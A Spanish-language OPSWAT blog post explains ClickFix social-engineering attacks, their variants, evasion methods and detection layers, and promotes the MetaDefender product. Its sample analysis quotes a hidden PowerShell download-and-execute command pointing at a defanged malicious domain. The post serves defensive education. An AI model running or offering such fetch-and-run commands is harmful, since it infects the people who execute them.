Envío de registros, alertas y datos de telemetría a través de un diodo de datos

Descubre cómo
Utilizamos inteligencia artificial para traducir el sitio web y, aunque nos esforzamos por garantizar la precisión, es posible que las traducciones no sean siempre 100 % exactas. Agradecemos tu comprensión.

Detectar y detener los ataques de ClickFix antes de que lleguen a tus dispositivos

MetaDefender detecta las cargas útiles de ClickFix que los sistemas EDR y los análisis estáticos suelen pasar por alto
Por OPSWAT
Comparte esta publicación

ClickFix es una técnica de ataque de ingeniería social que engaña a los usuarios para que ejecuten ellos mismos comandos maliciosos, normalmente copiando una carga útil de un CAPTCHA falso, un error del navegador o un mensaje de verificación, y pegándola en el cuadro de diálogo «Ejecutar» de Windows, en PowerShell o en el Explorador de archivos. Dado que es el propio usuario quien ejecuta el comando, no se envía ningún archivo malicioso que las defensas tradicionales puedan analizar, lo que permite que la carga útil eluda los filtros de correo electrónico, los antivirus estáticos y la mayoría de las herramientas de EDR (detección y respuesta en endpoints).

Esa ventaja estructural está dando sus frutos a los atacantes y suponiendo un coste para las organizaciones. Microsoft informa de que ClickFix representó el 47 % de las notificaciones de acceso inicial de su equipo Defender Experts durante el último año, mientras que la telemetría de ESET registró un aumento del 517 % en los ataques durante el primer semestre de 2025. Los casos de respuesta a incidentes de Palo Alto Unit 42 rastrean los daños en sectores críticos, con aproximadamente 180 incidentes en alta tecnología, 140 en servicios financieros y 130 en fabricación, lo que ha dado lugar al robo de credenciales, al robo de correo y a ransomware que afecta a toda la red.

Las campañas más destacadas de 2025 ponen de manifiesto la amplitud de los objetivos, desde la suplantación de identidad de Storm-1865 como Booking.com contra empresas del sector hotelero hasta el ataque a la cadena de suministro del proveedor de servicios de streaming LES Automotive, perpetrado en marzo de 2025, que infectó más de 100 sitios web de concesionarios de automóviles en una sola oleada.

En resumen: puntos clave

  • ClickFix traslada la ejecución del ataque al usuario, eludiendo los filtros de correo electrónico, los antivirus estáticos y la mayoría de las herramientas EDR, ya que no se envía ningún archivo malicioso para su análisis
  • Cinco grupos vinculados a Estados-nación de cinco países diferentes —entre ellos APT28, Kimsuky, MuddyWater, COLDRIVER y APT36— adoptaron ClickFix como sustituto directo en el plazo de aproximadamente un año, lo que pone de manifiesto que las barreras de adopción son extremadamente bajas
  • Los kits de desarrollo que se venden en foros clandestinos por entre 200 y 1500 dólares al mes ponen al alcance de los ciberdelincuentes de bajo nivel señuelos configurables, compatibilidad multilingüe, evasión de máquinas virtuales y la posibilidad de eludir el control de cuentas de usuario (UAC).
  • ClickFix es independiente de la carga útil y distribuye programas de robo de información, troyanos de acceso remoto (RAT), cargadores y ransomware completo a través de la misma cadena de infección, lo que complica la clasificación de incidentes en el centro de operaciones de seguridad (SOC).
  • Variantes como FileFix y ConsentFix amplían la superficie de ataque desde el cuadro de diálogo «Ejecutar» de Windows hasta el Explorador de archivos y la capa de identidad, lo que anula la eficacia de las claves de acceso y la autenticación multifactorial (MFA) resistente al phishing.
  • MetaDefender detecta las cargas útiles de ClickFix antes de que lleguen al terminal, utilizando emulación a nivel de instrucción en más de 50 tipos de archivos para contrarrestar las técnicas de evasión basadas en la sincronización y en la evitación de máquinas virtuales que las cajas de arena tradicionales no detectan.

¿Qué es un ataque ClickFix?

Un ataque ClickFix es una técnica de ingeniería social que convierte al usuario en el ejecutor. En lugar de distribuir malware como archivo adjunto o mediante una descarga automática, el atacante muestra un mensaje convincente —como un CAPTCHA falso, un error del navegador, una advertencia de actualización del sistema o un paso de verificación— y le indica al usuario que copie un comando y lo pegue en el cuadro de diálogo «Ejecutar» de Windows, en PowerShell o en otro entorno de ejecución. El usuario, creyendo que está llevando a cabo una reparación legítima, ejecuta la carga útil por sí mismo.

La técnica se desarrolla en tres pasos:

  1. Entrega: un correo electrónico de phishing, un sitio web comprometido, un resultado de búsqueda con publicidad maliciosa o una publicación en redes sociales lleva a la víctima a una página de engaño
  2. Ingeniería social: el mensaje suplantando a una marca de confianza o a un aviso del sistema presiona al usuario para que verifique, solucione o desbloquee algo
  3. Carga útil ejecutada por el usuario: el usuario copia un comando ofuscado en el portapapeles y lo pega en un entorno del sistema que lo ejecuta con sus propios privilegios

Esto difiere estructuralmente del phishing tradicional. No hay ningún archivo adjunto que se pueda activar ni ninguna descarga automática que se pueda interceptar. Para cuando la actividad maliciosa se hace perceptible en el terminal, parece una acción legítima del usuario: una persona ha escrito un comando y ha pulsado Intro. Por eso fallan las defensas automatizadas.

ClickFix también impulsó dos categorías paralelas de autoengaño: los ataques de «autoinfección», en los que el usuario ejecuta directamente el malware (el modelo original de ClickFix), y los ataques de «autofraude», en los que la ingeniería social empuja al usuario a facilitar el fraude, por ejemplo, autorizando una transferencia bancaria, concediendo el consentimiento OAuth (autorización abierta) o instalando una herramienta de asistencia remota.

¿Por qué ClickFix se ha extendido tan rápidamente por el panorama de las amenazas?

ClickFix pasó de ser una técnica de nicho a convertirse en un vector de intrusión dominante en unos 18 meses. Dos factores impulsaron esa curva de adopción: su comercialización en foros clandestinos y su validación por parte de actores estatales.

Comercialización: kits de montaje y foros clandestinos

Los kits de desarrollo ClickFix aparecieron en foros clandestinos a un precio de entre 200 y 1500 dólares al mes. Estos kits ofrecen señuelos configurables, compatibilidad multilingüe, evasión de máquinas virtuales y elusión del control de cuentas de usuario (UAC) desde el primer momento. Esta oferta redujo la barrera de entrada prácticamente a cero, lo que permitió a operadores con pocos conocimientos llevar a cabo campañas que antes requerían herramientas personalizadas. El resultado fue un fuerte aumento del volumen de actividad entre los grupos de ciberdelincuencia de todos los niveles.

La adopción del «Estado-nación» como sustituto directo

Cinco grupos estatales confirmados, procedentes de cuatro países, adoptaron ClickFix en un plazo de 90 días entre octubre de 2024 y enero de 2025: el APT28 de Rusia, el Kimsuky de Corea del Norte, el MuddyWater de Irán y el COLDRIVER, vinculado al FSB ruso. El grupo APT36 (Transparent Tribe) de Pakistán se confirmó en mayo de 2025, lo que eleva el total a cinco grupos estatales de cinco países.

El dato de inteligencia relevante era que estas APT (amenazas persistentes avanzadas) no desarrollaron nuevas campañas en torno a ClickFix. Simplemente incorporaron ClickFix a las fases de ejecución ya existentes, manteniendo los mismos objetivos, la misma infraestructura y las mismas cargas útiles posteriores. Esa rapidez en la sustitución indica que la barrera de adopción es extremadamente baja, lo cual constituye en sí mismo una señal de alerta. Cualquier técnica lo suficientemente económica como para que un actor estatal la incorpore a una operación en curso se extenderá rápidamente por todo el ecosistema de amenazas.

¿Cómo funciona la cadena de infección de ClickFix?

La cadena de infección de ClickFix consta de tres fases distintas, cada una con su propia oportunidad de detección y su propio punto débil.

Distribución: correo electrónico, sitios web comprometidos, Media sociales y publicidad maliciosa

ClickFix no depende de ningún canal de distribución concreto. TA571 distribuyó archivos adjuntos HTML a más de 100 000 buzones de correo en una sola campaña. ClearFake comprometió sitios web legítimos de WordPress a gran escala. Los vídeos de TikTok generados por IA acumularon 500 000 visualizaciones promocionando enlaces falsos para la activación de software. Cuatro de cada cinco páginas de engaño de ClickFix interceptadas procedían de resultados de búsqueda, no del correo electrónico. Esto indica que la publicidad maliciosa en la Búsqueda de Google se ha convertido en la principal vía de distribución.

Ingeniería social: taxonomía de los señuelos y tipos de páginas de destino

Los señuelos de ClickFix combinan una capa de confianza con una capa de destino. La capa de confianza se aprovecha de la autoridad de otras marcas mediante la suplantación de identidad, incluyendo Booking.com, la Administración de la Seguridad Social, Facebook, los portales de VPN de Fortinet y el Ministerio de Defensa de la India. La capa de destino muestra un CAPTCHA falso, un error del navegador o una solicitud de verificación del usuario. Los usuarios acceden a ello porque las señales visuales les resultan familiares, la autoridad implícita es institucional y la urgencia está incorporada en el mensaje.

Entornos de ejecución: PowerShell, el cuadro de diálogo «Ejecutar» y el Explorador de archivos

Hay tres entornos de ejecución principales. PowerShell fue el objetivo inicial. A continuación se incorporó el cuadro de diálogo «Ejecutar» de Windows, ya que ofrece una interfaz menos intimidatoria para los usuarios sin conocimientos técnicos. La barra de direcciones del Explorador de archivos se sumó a la lista con FileFix a mediados de 2025. La técnica es además independiente del sistema operativo: las variantes de Terminal de macOS utilizan comandos curl codificados en base64 para recuperar y ejecutar cargas útiles. Siempre que un usuario pueda pegar un comando y el sistema lo ejecute, ClickFix tiene una vía de acceso.

¿Qué servicios ofrece ClickFix?

ClickFix es independiente de la carga útil. La misma cadena de distribución y de ingeniería social sirve tanto para el robo de credenciales como para el acceso remoto persistente y el ransomware que afecta a toda la red. Eso es lo que complica la clasificación de incidentes en el SOC: un mismo patrón de detección puede corresponder a consecuencias muy diferentes, y el protocolo de respuesta para un programa de robo de información no es el mismo que para un precursor de ransomware.

Categorías de carga útil de ClickFix y consecuencias de las amenazas

Categoría de carga útil

Ejemplos

Resultado de la amenaza

Programas de robo de información

Lumma, StealC, Vidar, AMOS, Odyssey

Robo de credenciales, filtración de datos

RAT

AsyncRAT, XWorm, NetSupport, VenomRAT

Acceso remoto permanente

Cargadoras

DarkGate, Latrodectus, MintsLoader

Entrega de carga útil en varias etapas

Ransomware

Interlock, Qilin

Cifrado completo de la red

Rootkits

r77 (modificada)

Persistencia, evasión de la defensa

Uso indebido de las herramientas RMM

ScreenConnect, Nivel

Acceso con las manos en el teclado

Cómo está evolucionando ClickFix

ClickFix es un lienzo que los actores maliciosos no dejan de redibujar. A medida que los defensores se adaptan, los atacantes amplían el ámbito de ejecución y llevan el ataque a nuevas capas del entorno del usuario.

FileFix: del cuadro de diálogo «Ejecutar» al Explorador de archivos

FileFix trasladó el punto de ejecución del cuadro de diálogo «Ejecutar» de Windows a la barra de direcciones del Explorador de archivos. El Explorador de archivos es una herramienta que los usuarios abren a diario, lo que reduce la resistencia a la tentación y disminuye la desconfianza que puede generar el cuadro de diálogo «Ejecutar». FileFix apareció en la red menos de dos semanas después de la presentación pública de su prueba de concepto en julio de 2025.

ClickFix y FileFix: una comparación rápida

Atributo

ClickFix

FileFix

Objetivo de ejecución

Cuadro de diálogo «Ejecutar» de Windows

Barra de direcciones del Explorador de archivos

Familiaridad del usuario

Es inusual, despierta sospechas

Familiar, con menor fricción

Cadena de procesos

Explorer.exe → PowerShell

Navegador → PowerShell

Bloqueo de GPO

Bastante sencillo

Más difícil de bloquear mediante GPO

Visto por primera vez en su hábitat natural

Marzo de 2024

Julio de 2025 (dos semanas después de la prueba de concepto)

ConsentFix: Ataques a la capa de identidad que eluden las claves de acceso

ConsentFix traslada el ataque por completo fuera del dispositivo final y lo sitúa en la capa de identidad. La víctima realiza un inicio de sesión legítimo en Microsoft y, a continuación, pega un código de autorización OAuth en una página de phishing, lo que concede al atacante acceso a la CLI (interfaz de línea de comandos) de Azure. Dado que la autenticación en sí es auténtica, esta técnica elude las claves de acceso y la autenticación multifactorial (MFA) resistente al phishing.

Una campaña llevada a cabo en diciembre de 2025 demostró madurez operativa, incluyendo el bloqueo sincronizado de direcciones IP en todos los sitios de phishing en el momento en que la víctima concedía su consentimiento, lo que impidió a los equipos de respuesta a incidentes reproducir el flujo durante la investigación.

¿Qué otras variantes de ClickFix están surgiendo?

Además de FileFix y ConsentFix, se han documentado otras cuatro variantes: PromptFix, CrashFix, TerminalFix y DownloadFix. Cada una de ellas se centra en una superficie de ejecución o un desencadenante del comportamiento del usuario distintos. Este patrón indica una exploración sistemática: los autores de las amenazas están analizando todas las superficies de «pegar y ejecutar» disponibles en el sistema operativo y el navegador, y el catálogo de variantes seguirá ampliándose.

Por qué las defensas tradicionales fracasan frente a ClickFix

Microsoft Defender Experts informa de que miles de dispositivos empresariales se ven comprometidos a diario por la actividad de ClickFix, a pesar de contar con un sistema EDR activo. El fallo es de carácter arquitectónico. El EDR supervisa el comportamiento de los procesos, pero cuando el usuario es la capa de ejecución, la acción maliciosa resulta indistinguible de una acción legítima del usuario. Los escáneres estáticos no detectan ningún archivo. Los filtros de correo electrónico no detectan ninguna carga útil. Esta brecha existe por el propio diseño de la técnica.

¿Cómo consigue ClickFix pasar desapercibido?

La evasión de ClickFix funciona en dos niveles:

A nivel de comandos: fragmentación entre variables, codificación Base64, operaciones XOR, manipulación de cadenas, uso indebido de comentarios y relleno, y ejecuciones anidadas.

A nivel de infraestructura y carga útil: alojamiento de la carga útil en plataformas de confianza como SharePoint y GitHub, esteganografía en imágenes JPG y PNG, LOLBins (binarios «living-off-the-land»), contrabando de datos a través de la caché local del navegador y EtherHiding a través de Binance Smart Chain. Para que la detección sea eficaz, debe abordar ambos niveles.

Cómo detectar los ataques ClickFix antes de que lleguen al Endpoint

La detección debe realizarse lo antes posible en la cadena. Cuanto más adelante se sitúe la detección, mayor será el coste de la respuesta. Hay tres niveles que ofrecen un punto de interceptación eficaz: el perímetro, el punto final y el análisis de archivos previo a la ejecución.

Detección perimetral: Analiza los archivos adjuntos de correo electrónico (.eml y .msg), los archivos HTML alojados en la web, las URL incrustadas y los archivos PDF que contienen enlaces a páginas de ClickFix. Cuanto antes se identifique un señuelo en la cadena de entrega, mejor; lo ideal es que sea antes de que el usuario lo cargue.

Endpoint : la supervisión del registro RunMRU, la supervisión del contenido del portapapeles, las anomalías en el árbol de procesos (navegador que ejecuta PowerShell) y el registro de bloqueos de scripts de PowerShell son las señales más útiles para detectar ejecuciones en curso o para respaldar el análisis forense posterior a la ejecución.

Sandbox : Detona los señuelos, scripts y cargadores HTML sospechosos en un entorno aislado basado en emulación antes de que lleguen al usuario, extrayendo indicadores de comportamiento (IOC) y tácticas, técnicas y procedimientos (TTP) mapeados según MITRE que el EDR no puede generar, ya que aún no se ha ejecutado ningún proceso.

Ejemplo real: un señuelo HTML de ClickFix detectado mediante emulación

Un ejemplo reciente de código HTML analizado por el motor de emulación en entorno aislado MetaDefender muestra esta técnica en acción. El archivo horno-rafelet-es.html (SHA-256 19580e8669c730f634ce986955b23d021d5…) fue identificado como una amenaza confirmada en las cuatro capas de detección.

  • Señuelo: una página falsa de CAPTCHA del tipo «Verifica que eres humano» que utiliza una imagen del logotipo de Google reCAPTCHA
  • Carga útil del portapapeles: POWerShell -W h con un comando codificado en Base64 que se decodifica como iex (iwr 'https://amazon-ny-gifts[.]com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content
  • Técnicas de MITRE observadas : T1059.001 PowerShell, T1204 Ejecución por parte del usuario, T1027 Desofuscar o descodificar archivos o información, T1115 Datos del portapapeles
  • Veredicto de OSINT: amazon-ny-gifts[.]com ha sido marcado como MALICIOSO por OPSWAT
  • Proceso de detección: la reputación de la amenaza se vio afectada en la URL de prueba; la emulación en el entorno de pruebas detectó una manipulación encubierta del portapapeles y la ejecución de PowerShell; la puntuación de la amenaza se consolidó en un veredicto de «Amenaza confirmada».

La muestra nunca tuvo que ejecutarse en un terminal real. El mero archivo HTML, analizado antes de su envío, proporcionó a los defensores los indicadores de compromiso (IOC) y los comportamientos asignados a MITRE necesarios para bloquear la campaña.

MetaDefender identifica el archivo «horno-rafelet-es.html», un señuelo falso de CAPTCHA de ClickFix, como una amenaza confirmada en las cuatro capas de detección de vulnerabilidades de día cero.

Cómo detecta MetaDefender las cargas útiles de ClickFix

MetaDefender es la solución unificada de detección de vulnerabilidades de día cero OPSWAT, diseñada específicamente para identificar amenazas evasivas —incluidas las cargas útiles de ClickFix— que eluden los análisis estáticos, los filtros de correo electrónico y los controles de los terminales. Esta solución subsana esa laguna estructural analizando el archivo antes de que el usuario llegue a ver el señuelo.

El proceso de detección de cuatro etapas

  • Reputación de amenazas: cada archivo se compara con más de 50 000 millones de indicadores de compromiso extraídos de la red global de inteligencia OPSWAT, lo que permite detectar los señuelos conocidos de ClickFix y los hash de las cargas útiles antes de que sea necesario realizar un análisis más exhaustivo
  • Motor de puntuación de amenazas : combina los resultados del entorno de pruebas, los datos de reputación y los indicadores de comportamiento en una única puntuación de fiabilidad por archivo, eliminando los cambios manuales que ralentizan la clasificación de incidentes en el SOC
  • Búsqueda de similitudes mediante aprendizaje automático: agrupa las nuevas muestras con familias y campañas de malware conocidas, detectando variantes de FileFix, ConsentFix y otras variantes de ClickFix, incluso cuando la carga útil acaba de ser empaquetada u ofuscada
Proceso de detección de malware de cuatro etapas de MetaDefender

Por qué esto es importante para ClickFix y ataques similares

  • Detecta páginas HTML engañosas, scripts y cargadores en varias etapas que el EDR no puede detectar porque aún no se ha ejecutado ningún proceso
  • Extrae indicadores de compromiso (IOC) de comportamiento y TTP (tácticas, técnicas y procedimientos) mapeados con el marco MITRE ATT&CK que los equipos de caza de amenazas pueden utilizar como punto de partida en sistemas SIEM y SOAR
  • Ofrece un veredicto único y consolidado por cada archivo con una eficacia de detección de amenazas de día cero del 99,9 %, lo que elimina la necesidad de realizar conciliaciones manuales que consumen tanto tiempo al centro de operaciones de seguridad (SOC).
  • Se integra en los flujos de trabajo Email Security, MFT transferencia gestionada de archivos), ICAP, Storage Security, Kiosk y entre dominios MetaDefender , de modo que todos los archivos que entran en el entorno se someten a la misma inspección de día cero
  • Se puede implementar en las propias instalaciones, en la nube o como una instancia independiente MetaDefender SaaS para entornos aislados físicamente y regulados

ClickFix no va a desaparecer. A medida que variantes como FileFix y ConsentFix amplían la superficie de ataque más allá de lo que pueden cubrir los controles de los terminales, la brecha estructural se agranda. Para cerrarla, se necesita una detección que identifique la carga útil antes de que el usuario la vea. Mientras que el EDR detecta una acción del usuario, MetaDefender detecta la carga útil y la analiza antes de que la ejecución llegue al terminal.

Descubre cómo MetaDefender OPSWAT detecta las cargas útiles de ClickFix, las variantes de FileFix y otras amenazas evasivas de día cero antes de que lleguen a tus dispositivos finales. Habla con un experto para que te guíe por tu entorno.

Preguntas frecuentes

¿Qué es un ataque ClickFix?

Un ataque ClickFix es una técnica de ingeniería social que engaña a los usuarios para que ejecuten ellos mismos comandos maliciosos. El atacante muestra un CAPTCHA falso, un error del navegador o un mensaje de verificación en el que se indica al usuario que copie una carga útil al portapapeles y la pegue en el cuadro de diálogo «Ejecutar» de Windows, en PowerShell o en el Explorador de archivos. Dado que es el usuario quien ejecuta el comando, no se envía ningún archivo malicioso que las defensas tradicionales puedan analizar.

¿Cómo consigue ClickFix eludir el EDR y el antivirus?

ClickFix elude los sistemas EDR y los antivirus porque es el propio usuario quien actúa como capa de ejecución. No hay ningún archivo adjunto malicioso que los escáneres estáticos puedan analizar ni ninguna cadena de ejecución automatizada que el EDR pueda detectar, ya que es el propio proceso del usuario el que ejecuta el comando. Para cuando las señales de comportamiento se hacen visibles en el terminal, la acción parece una actividad legítima del usuario.

¿Cuál es la diferencia entre ClickFix y FileFix?

ClickFix se dirige al cuadro de diálogo «Ejecutar» de Windows. FileFix se dirige a la barra de direcciones del Explorador de archivos. El Explorador de archivos resulta más familiar para los usuarios habituales, lo que reduce la resistencia a la infección, y FileFix es más difícil de bloquear mediante la Política de grupo. FileFix apareció en el entorno real a las dos semanas de la publicación de su prueba de concepto en julio de 2025.

¿Qué tipo de malware distribuye ClickFix?

ClickFix es independiente de la carga útil. Las cargas útiles documentadas incluyen ladrones de información (Lumma, StealC, Vidar, AMOS, Odyssey), RAT (AsyncRAT, XWorm, NetSupport, VenomRAT), cargadores (DarkGate, Latrodectus, MintsLoader), ransomware (Interlock, Qilin), rootkits y herramientas RMM mal utilizadas (ScreenConnect, Level). La misma cadena de distribución e ingeniería social transporta a cada uno de ellos.

¿Cómo pueden las organizaciones detectar y prevenir los ataques de ClickFix?

La detección eficaz funciona en tres capas: análisis perimetral de archivos adjuntos de correo electrónico, archivos HTML y URL; señales de los terminales, como la supervisión del registro RunMRU, el contenido del portapapeles y el registro de bloqueos de scripts de PowerShell; y análisis de archivos de día cero que emula el comportamiento de la CPU y del sistema operativo para activar la carga útil antes de que llegue al usuario. MetaDefender proporciona la tercera capa, aplicando emulación a nivel de instrucción en más de 50 tipos de archivos para contrarrestar la evasión basada en la sincronización y la protección contra máquinas virtuales que utilizan las cargas útiles de ClickFix.

Etiquetas:

¡Mantente al día con OPSWAT!

Regístrate hoy mismo para recibir las últimas novedades de la empresa, historias, información sobre eventos y mucho más.